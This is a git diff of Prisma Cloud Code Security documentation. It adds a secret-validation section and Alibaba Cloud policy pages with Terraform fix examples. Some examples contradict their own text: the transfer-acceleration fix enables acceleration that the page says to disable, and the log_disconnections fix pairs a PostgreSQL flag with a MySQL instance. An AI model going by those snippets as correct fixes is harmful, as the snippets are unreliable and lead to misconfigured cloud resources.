diff --git a/code-security/admin_guide/_graphics/secrets-validate-1.png b/code-security/admin_guide/_graphics/secrets-validate-1.png
new file mode 100644
index 000000000..4a905f0ed
Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-1.png differ
diff --git a/code-security/admin_guide/_graphics/secrets-validate-2.png b/code-security/admin_guide/_graphics/secrets-validate-2.png
new file mode 100644
index 000000000..3f733f47c
Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-2.png differ
diff --git a/code-security/admin_guide/_graphics/secrets-validate-3.png b/code-security/admin_guide/_graphics/secrets-validate-3.png
new file mode 100644
index 000000000..c5693e6de
Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-3.png differ
diff --git a/code-security/admin_guide/_graphics/secrets-validate-4.gif b/code-security/admin_guide/_graphics/secrets-validate-4.gif
new file mode 100644
index 000000000..f3e2c96b4
Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-4.gif differ
diff --git a/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc b/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc
index 9d2e72bb3..5361148dd 100644
--- a/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc
+++ b/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc
@@ -41,6 +41,11 @@ image::bitb-server-5.png[width=550] + By default, the access token's permissions are set to match your current level of access. You need to define two levels of permissions - *Project permissions* and *Repository permission*. Repository permissions inherit from Project permissions; thus, the Repository permission must be at least as high as the Project permission.
For example, if you have Project write permission, you should also have Repository write permission. You can always modify or revoke token permissions. For more information about Project and Repository permissions, see the https://confluence.atlassian.com/bitbucketserver0717/personal-access-tokens-1087535496.html[Bitbucket Server documentation]. + +*Required Permissions:* + +* *For Projects - Read* + +* *For Repositories - Admin* ++ image::bitb-server-6.png[width=550] .. Add *Expiry*.
diff --git a/code-security/admin_guide/get-started/setup-administrator-access.adoc b/code-security/admin_guide/get-started/setup-administrator-access.adoc
index a927fde66..d7c8b9a31 100644
--- a/code-security/admin_guide/get-started/setup-administrator-access.adoc
+++ b/code-security/admin_guide/get-started/setup-administrator-access.adoc
@@ -7,7 +7,9 @@ To know more see https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cl
Administrators can create a custom permission group for Code Security on the Prisma Cloud console. Using the parameters for permissions, you can limit or enhance the responsibilities of the users.
-* *Suppression Management*: You can enable user permissions to view, create, update and delete resources on *Repositories* (Settings > Repositories). These parameters enable suppression management for vulnerabilities found in resources. In addition, configuring view permission for all Code Security functions allows you to see the resource vulnerabilities to make informed decisions.
+* *Repositories*: You can enable user permissions to view, create, update and delete resources on *Repositories* (Settings > Repositories). These parameters enable suppression management for vulnerabilities found in resources. In addition, configuring view permission for all Code Security functions allows you to see resource vulnerabilities and make informed decisions.
++
+NOTE: You must select both Create and Update permissions when onboarding new repositories.
* *Code Security Configuration*: Enabling permissions for Code Security Configuration helps you manage Code Security licenses, Enforcement thresholds, notifications, and developer suppressions, and create rules to exclude paths from scans.
diff --git a/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc b/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc
index 91d9c2002..50204f997 100644
--- a/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc
+++ b/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc
@@ -50,40 +50,30 @@ To understand the default scan parameter on Prisma Cloud with the enforcement ru
 | | Info| Low | Medium | High | Critical
-|Vulnerabilities
-5+| Hard Fail
-
-Soft Fail
-
-Comment Bot
-
-|Licenses
-5+| Hard Fail
-
-Soft Fail
-
-Comment Bot
-
-|IaC
-5+| Hard Fail
-
-Soft Fail
-
-Comment Bot
-
-|Build Integrity
-5+| Hard Fail
-
-Soft Fail
-
-Comment Bot
-
-|Secrets
-5+| Hard Fail
-
-Soft Fail
-
-Comment Bot
+.3+|Vulnerabilities
+| | | | | Hard Fail
+| |Soft Fail | | |
+| |Comments Bot | | |
+
+.3+|Licenses
+| | | | | Hard Fail
+| |Soft Fail | | |
+| |Comments Bot | | |
+
+.3+|IaC
+| |Hard Fail | | |
+| |Soft Fail | | |
+| |Comments Bot | | |
+
+.3+|Build Integrity
+| |Hard Fail | | |
+| |Soft Fail | | |
+| |Comments Bot | | |
+
+.3+|Secrets
+| |Hard Fail | | |
+| |Soft Fail | | |
+| |Comments Bot | | |
 |===
diff --git a/code-security/admin_guide/scan-monitor/secrets-scanning.adoc b/code-security/admin_guide/scan-monitor/secrets-scanning.adoc
index dd33724cb..1f1a3b2c3 100644
--- a/code-security/admin_guide/scan-monitor/secrets-scanning.adoc
+++ b/code-security/admin_guide/scan-monitor/secrets-scanning.adoc
@@ -1,6 +1,6 @@
== Secrets Scanning
-You can use Code Security to detect and block secrets in IaC files stored in your IDEs, Git-based VCS, and CI/CD pipelines.
+You can use Code Security to detect and block secrets in files in your IDEs, VCS repositories, and CI/CD pipelines.

A secret is a programmatic access key that provides systems with access to information, services or assets. Developers use secrets such as API keys, encryption keys, OAuth tokens, certificates, PEM files, passwords, and passphrases to enable their application to securely communicate with other cloud services.

@@ -9,25 +9,45 @@ For identifying secrets, Prisma Cloud provides default policies that use domain-

image::scan-results-secrets-ide.png[width=800]

+=== Validate Secrets
+
+When scanning for secrets, Prisma Cloud can validate secrets against public APIs to verify whether the secret is still active, so that you can prioritize and handle exposed secrets quickly.
+
+By default, secret validation is disabled. You can enable validation for secrets scans from *Settings > Code Security Configuration > Validate Secrets*.
+
+Additionally, you can run Checkov on your repositories to filter for valid secrets that may be exposed. To see a list of potentially exposed secrets, add the environment variable `CKV_VALIDATE_SECRETS=true` after enabling Validate Secrets.
+
+In this example, after running Checkov in the terminal, you see a valid secret in the repository that needs to be prioritized.
+
+image::secrets-validate-3.png[width=400]
+
+You can see the secrets scan results after validation on *Projects > Secrets*, and then use *Resource Explorer* to prioritize a valid secret with either a *Suppress* or a *Manual Fix* on the secret.
+
+image::secrets-validate-4.gif[width=800]
+
[.task]
=== Suppress Secret Notifications

-You have two ways to suppress notifications for a policy violation.
You can either https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/prisma-cloud-policies/manage-prisma-cloud-policies[disable] a policy or suppress a notification for a specific resource or repository. As an example, you do not want to be notified of a violation for issues on non-production environments, or for resources without specific tags.
+When you suppress a notification for a secret, you choose to no longer receive any information on violations related to the suppressed secret. To suppress a notification, you define a suppression rule by adding a justification with an expiration time.

[.procedure]
-. Select *Code Security > Projects*.
+. Select *Code Security > Projects > Secrets*.
+
+. Configure a suppression rule for a secret.

-. Filter scan results.
-.. Add *Category*-*Secrets*.
-.. Add *Status*: *Errors*.
+.. Select a secret and then *Suppress*.
+
-image::scan-results-secrets-1.png[width=800]
+In this example, AWS Secret Keys are invalid in a GitHub Actions repository.
++
+image::secrets-validate-1.png[width=800]

-. *Suppress* the notification.
+.. Add a *Justification* with the *Expiration Time*.
+
-You can select the specific resource, or resources that are assigned a specific tag, or suppress notifications for this policy violation across one or more repositories.
+image::secrets-validate-2.png[width=600]
+
-image::scan-results-secrets-2.png[width=800]
+Optionally, you can choose a *Manual Fix* to resolve the secret violation.
+
+. Select *Save*.
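The Checkov-based validation flow described in the secrets-scanning section above can be sketched as a CLI invocation. This is a hedged example, not an official command from this guide: the repository path, repo id, and key variables are placeholders, and secret validation requires the scan to be connected to the platform with an API key.

```shell
# Hypothetical invocation; paths and credentials are placeholders.
# Filter scan results down to validated (still-active) secrets.
export CKV_VALIDATE_SECRETS=true
checkov --directory ./my-repo --framework secrets \
  --bc-api-key "$ACCESS_KEY::$SECRET_KEY" \
  --repo-id my-org/my-repo
```

Validated findings then appear under *Projects > Secrets* as described above, where you can suppress or manually fix them.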
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc
new file mode 100644
index 000000000..30639f71e
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc
@@ -0,0 +1,84 @@
+== Alibaba General Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:ensure-alibaba-cloud-database-instance-is-not-public.adoc[Alibaba Cloud database instance accessible to public]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py[CKV_ALI_9]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc[Alibaba Cloud Disk is not encrypted with Customer Master Key]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py[CKV_ALI_8]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-disk-is-encrypted.adoc[Alibaba Cloud disk encryption is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py[CKV_ALI_7]
+|MEDIUM
+
+
+|xref:ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc[Alibaba Cloud KMS Key Rotation is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py[CKV_ALI_27]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc[Alibaba Cloud MongoDB does not have transparent data encryption enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py[CKV_ALI_44]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc[Alibaba Cloud OSS bucket has transfer Acceleration disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py[CKV_ALI_11]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc[Alibaba Cloud OSS bucket has versioning disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py[CKV_ALI_10]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc[Alibaba Cloud OSS bucket is not encrypted with Customer Master Key]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py[CKV_ALI_6]
+|MEDIUM
+
+
+|xref:ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc[Alibaba Cloud OSS bucket accessible to public]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py[CKV_ALI_1]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc[Alibaba Cloud RDS instance has log_disconnections disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py[CKV_ALI_36]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc[Alibaba Cloud KMS Key is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py[CKV_ALI_28]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc[Alibaba Cloud RDS instance does not have log_duration enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py[CKV_ALI_35]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc[Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py[CKV_ALI_30]
+|LOW
+
+
+|xref:ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc[Alibaba Cloud RDS log audit is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py[CKV_ALI_38]
+|LOW
+
+
+|xref:ensure-alibaba-rds-instance-has-log-connections-enabled.adoc[Alibaba RDS instance has log_connections disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py[CKV_ALI_37]
+|LOW
+
+
+|===
+
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc
new file mode 100644
index 000000000..546c02ef9
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc
@@ -0,0 +1,63 @@
+== Alibaba Cloud database instance accessible to public
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 22d28a0c-a979-4a99-8614-919dcc393ae4
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py[CKV_ALI_9]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Public database instances are vulnerable, as attackers can use a variety of techniques to gain unauthorized access to public databases, such as SQL injection attacks, brute-force attacks, or exploiting misconfigurations or vulnerabilities in the database software. To prevent this risk, make the database instance private by restricting access to only authorized users.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "alicloud_db_instance" "pass" {
+  engine              = "MySQL"
+  engine_version      = "5.6"
+  db_instance_class   = "rds.mysql.t1.small"
+  db_instance_storage = "10"
+  security_ips = [
+    "10.23.12.24"
+  ]
+  parameters = [{
+    name  = "innodb_large_prefix"
+    value = "ON"
+  }, {
+    name  = "connect_timeout"
+    value = "50"
+  }]
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc
new file mode 100644
index 000000000..06e7c12ae
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc
@@ -0,0 +1,56 @@
+== Alibaba Cloud Disk is not encrypted with Customer Master Key
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| db67af3f-47dd-49ca-9a96-ce12924d9d89
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py[CKV_ALI_8]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Encrypting your disk with a CMK helps protect your data from unauthorized access or tampering.
+By encrypting your disk, you can ensure that only authorized users with the correct key can access and decrypt the data, and that the data is protected while in storage.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "alicloud_disk" "pass" {
+  # cn-beijing
+  description = "Hello ecs disk."
+  category    = "cloud_efficiency"
+  size        = "30"
+  encrypted   = true
+  kms_key_id  = "2a6767f0-a16c-1234-5678-13bf*****"
+  tags = {
+    Name = "TerraformTest"
+  }
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc
new file mode 100644
index 000000000..0d428d50c
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc
@@ -0,0 +1,80 @@
+== Alibaba Cloud disk encryption is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 305caeb2-efb9-4414-91fd-0c5cdeb70714
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py[CKV_ALI_7]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling disk encryption leaves sensitive data stored on the disk vulnerable to unauthorized access and potential data breaches. If the disk is accessed by an unauthorized party, the sensitive data on it can be easily compromised, leading to loss of confidentiality and integrity of the data. To prevent this risk, enable Alibaba Cloud disk encryption. Snapshots created from disks that have been encrypted, as well as new disks created from those snapshots, will be encrypted automatically.
+
+//=== Fix - Runtime
+
+
+//*Alibaba Cloud Portal Alibaba Cloud disk can only be encrypted at the time of disk creation.*
+
+
+//So to resolve this alert, create a new disk with encryption and then migrate all required disk data from the reported disk to this newly created disk.
+//To create an Alibaba Cloud disk with encryption:
+
+//. Log in to Alibaba Cloud Portal
+
+//. Go to Elastic Compute Service
+
+//.
In the left-side navigation pane, click on 'Disks' which is under 'Storage & Snapshots'.
+//+
+//Click on 'Create Disk'
+
+//. Check the 'Disk Encryption' box in the 'Disk' section
+
+//. Click on 'Preview Order' and make sure parameters are chosen correctly
+
+//. Click on 'Create'. After you create a disk, attach that disk to other resources per your requirements.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+Add the following code to your Terraform file during buildtime.
+
+[source,go]
+----
+resource "alicloud_disk" "pass" {
+  # cn-beijing
+  description = "Hello ecs disk."
+  category    = "cloud_efficiency"
+  size        = "30"
+  encrypted   = true
+  kms_key_id  = "2a6767f0-a16c-1234-5678-13bf*****"
+  tags = {
+    Name = "TerraformTest"
+  }
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc
new file mode 100644
index 000000000..a1a37a282
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc
@@ -0,0 +1,55 @@
+== Alibaba Cloud KMS Key Rotation is disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 57146ef0-2467-4e9c-a474-7f99dc771640
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py[CKV_ALI_27]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+A key is a named object representing a cryptographic key used for a specific purpose, including data protection.
+The key material, the actual bits used for encryption, can change over time as new key versions are created.
+A collection of files could be encrypted with the same key, and anyone with decrypt permission on that key would be able to decrypt those files.
+We recommend you set a key rotation period.
+A key can be created with a specified rotation period, which is the time when new key versions are generated automatically.
+A key can also be created with a specified next rotation time.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "alicloud_kms_key" "pass" {
+  description            = "Hello KMS"
+  pending_window_in_days = "7"
+  status                 = "Enabled"
+  automatic_rotation     = "Enabled"
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc
new file mode 100644
index 000000000..d24a1dd26
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc
@@ -0,0 +1,61 @@
+== Alibaba Cloud MongoDB does not have transparent data encryption enabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5a432551-8705-4aa2-b9fc-7f541e56669a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py[CKV_ALI_44]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Transparent data encryption for your Alibaba Cloud MongoDB helps protect your data from unauthorized access or tampering by encrypting the data as it is written to disk and decrypting it when it is accessed.
+By enabling transparent data encryption, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in storage.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "alicloud_mongodb_instance" "pass" {
+  engine_version      = "3.4"
+  db_instance_class   = "dds.mongo.mid"
+  db_instance_storage = 10
+  vswitch_id          = alicloud_vswitch.ditch.id
+  security_ip_list    = ["10.168.1.12", "100.69.7.112"]
+  ssl_action          = "Update"
+  network_type        = "VPC"
+  tde_status          = "enabled"
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc
new file mode 100644
index 000000000..904e3d0a6
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc
@@ -0,0 +1,53 @@
+== Alibaba Cloud OSS bucket has transfer Acceleration disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 11a6fc89-f3ed-4231-bbd0-74b28fd4bda8
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py[CKV_ALI_11]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+The transfer acceleration function in Object Storage Service (OSS) enables quick access and transfer of stored objects for global users. However, it may result in higher data transfer costs since transfer acceleration incurs rates higher than those of standard transfer rates. To prevent this risk, disable transfer acceleration.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+Add the following code to your Terraform file during buildtime.
+
+
+[source,go]
+----
+resource "alicloud_oss_bucket" "pass" {
+  bucket = "bucket_name"
+
+  transfer_acceleration {
+    enabled = true
+  }
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc
new file mode 100644
index 000000000..4869c60a7
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc
@@ -0,0 +1,55 @@
+== Alibaba Cloud OSS bucket has versioning disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7e6a6a80-42b4-4609-b23c-101f0de481bc
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py[CKV_ALI_10]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling versioning for an Alibaba Cloud OSS bucket can result in potential data loss, compliance issues, accidental deletion or modification, and a lack of ability to track changes. To prevent this risk, enable bucket versioning to automatically archive all versions of an object, including writes and deletes. This allows you to recover previous versions of an object or restore an accidentally deleted object.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+Enable OSS bucket versioning by adding the following code to your Terraform file during buildtime.
+
+
+[source,go]
+----
+resource "alicloud_oss_bucket" "pass" {
+  bucket = "bucket-123-versioning"
+  acl    = "private"
+
+  versioning {
+    status = "Enabled"
+  }
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc
new file mode 100644
index 000000000..d56696218
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc
@@ -0,0 +1,56 @@
+== Alibaba Cloud OSS bucket is not encrypted with Customer Master Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d5c45439-679c-4201-8267-5930c7257c31
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py[CKV_ALI_6]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+An Alibaba Cloud OSS bucket that is not encrypted with a Customer Master Key is vulnerable to unauthorized access and potential data breaches. If the bucket is accessed by an unauthorized party, the sensitive data in it can be easily compromised, leading to loss of confidentiality and integrity of the data. To prevent this risk, encrypt OSS buckets with a CMK.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+Encrypt your OSS bucket by adding the following code to your Terraform file during buildtime.
+
+
+[source,go]
+----
+resource "alicloud_oss_bucket" "pass" {
+  bucket = "bucket-123"
+  acl    = "private"
+
+  server_side_encryption_rule {
+    sse_algorithm     = "KMS"
+    kms_master_key_id = "your kms key id"
+  }
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc
new file mode 100644
index 000000000..1809b8909
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc
@@ -0,0 +1,68 @@
+== Alibaba Cloud OSS bucket accessible to public
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 05d705e6-5b6c-43ae-b2ab-5d6e279a66ae
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py[CKV_ALI_1]
+
+|Severity
+|LOW
+
+|Subtype
+|Build,
+// Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Publicly accessible Object Storage Service (OSS) buckets are vulnerable, as attackers can gain unauthorized access to highly sensitive enterprise data which, if left open to the public, may result in sensitive data leaks. To prevent this risk, ensure that the OSS bucket is made private by restricting access to authorized users only.
+
+////
+=== Fix - Runtime
+Alibaba Cloud Portal
+. Log in to Alibaba Cloud Portal
+
+. Go to Object Storage Service
+
+. In the left-side navigation pane, click on the reported bucket
+
+. In the 'Basic Settings' tab, In the 'Access Control List (ACL)' Section, Click on 'Configure'
+
+. For 'Bucket ACL' field, Choose 'Private' option
+
+.
Click on 'Save'
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+Make the OSS bucket private by adding the following code to your Terraform file during buildtime.
+
+
+[source,go]
+----
+resource "alicloud_oss_bucket" "good-bucket" {
+  bucket = "bucket-1732-acl"
+  acl    = "private"
+}
+----
diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc
new file mode 100644
index 000000000..9c0a806bd
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc
@@ -0,0 +1,70 @@
+== Alibaba Cloud RDS instance has log_disconnections disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 70df95e5-51d6-4a46-9966-a0ea302ab91c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py[CKV_ALI_36]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+By default, RDS does not log session details, including the session duration and session end.
+Enabling the log_disconnections database flag creates a log entry at the end of each session, including the session duration, which is useful when troubleshooting issues and investigating unusual activity over a period.
+We recommend you set the log_disconnections flag for a PostgreSQL instance to On.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "alicloud_db_instance" "pass2" {
+  engine           = "MySQL"
+  engine_version   = "5.6"
+  instance_type    = "rds.mysql.t1.small"
+  instance_storage = "10"
+  security_ips = [
+    "10.23.12.24/24"
+  ]
+
+  parameters {
+    name  = "log_duration"
+    value = "on"
+  }
+
+  parameters {
+    name  = "log_disconnections"
+    value = "on"
+  }
+}
+----
